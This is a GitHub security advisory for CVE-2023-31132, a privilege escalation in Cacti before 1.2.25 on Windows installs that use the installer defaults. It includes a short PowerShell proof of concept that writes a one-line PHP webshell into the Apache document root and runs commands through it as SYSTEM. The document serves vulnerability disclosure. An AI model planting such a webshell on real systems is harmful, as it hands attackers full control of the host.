Skip to content

Privilege escalation when Cacti installed using Windows Installer defaults

High
netniV published GHSA-rf5w-pq3f-9876 Sep 5, 2023

Package

No package listed

Affected versions

< 1.2.25

Patched versions

1.2.25, 1.3.0

Description

Summary

Short summary of the problem. Make the impact and severity as clear as possible. For example: An unsafe deserialization vulnerability allows any unauthenticated user to execute arbitrary code on the server.

A researcher within Tenable has discovered a privilege escalation vulnerability in Cacti 1.2.24. A low-privileged OS user with access to a Windows host where Cacti is installed can create arbitrary PHP files in a web document directory. The user can then execute the PHP files under the security context of SYSTEM.

Details

Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer.

We believe the vulnerability has a CVSSv3 vector of CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H. We have verified this issue with Cacti 1.2.24 installed on a Windows Server 2019 virtual machine. Here are the steps we used to set up the application:

  • Download and run installer Cacti-1.2.24.exe as Administrator
  • Select Apache as the web server and use defaults for other settings
  • Login to the Cacti web UI to finish the initial Cacti configuration
  • Create a low-privileged OS user (i.e., user1 in Users group) with RDP privilege

PoC:
// After login/RDP as user1

PS C:\Users\user1> echo '<?php system($_SERVER[''HTTP_X_CMD'']);?>' | Out-File -Encoding utf8 C:\Apache24\htdocs\cacti\webshell.php
PS C:\Users\user1>
PS C:\Users\user1> Invoke-WebRequest -UseBasicParsing -Headers @{'x-cmd'='whoami'} -Uri http://localhost/cacti/webshell.php | select -ExpandProperty  Content
nt authority\system

Impact

What kind of vulnerability is it? Who is impacted?
Privilege escalation from normal user account to SYSTEM.

Disclosure Policy

Tenable follows a 90-day vulnerability disclosure policy. That means, even though we prefer coordinated disclosure, we’ll issue an advisory on June 18, 2023 with or without a patch. Alternatively, any uncoordinated vendor release of a patch or advisory to any customers before the 90-day deadline will be considered public disclosure, and Tenable may release an advisory prior to the coordinated disclosure date. Please read the full details of our policy here: https://static.tenable.com/research/tenable-vulnerability-disclosure-policy.pdf.

This issue is tracked internally via TRA-469.

Thank you for taking the time to read this. We'd greatly appreciate it if you'd acknowledge receipt of this report. If you have any questions, we'd be happy to address them.

BETA Installer version

A beta version of the 1.2.25 installer has been published along with a post on our forum regarding this at https://forums.cacti.net/viewtopic.php?p=292797#p292797 which should be read prior to installing. This is not a production-ready release.

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Local
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE ID

CVE-2023-31132

Weaknesses

No CWEs

Credits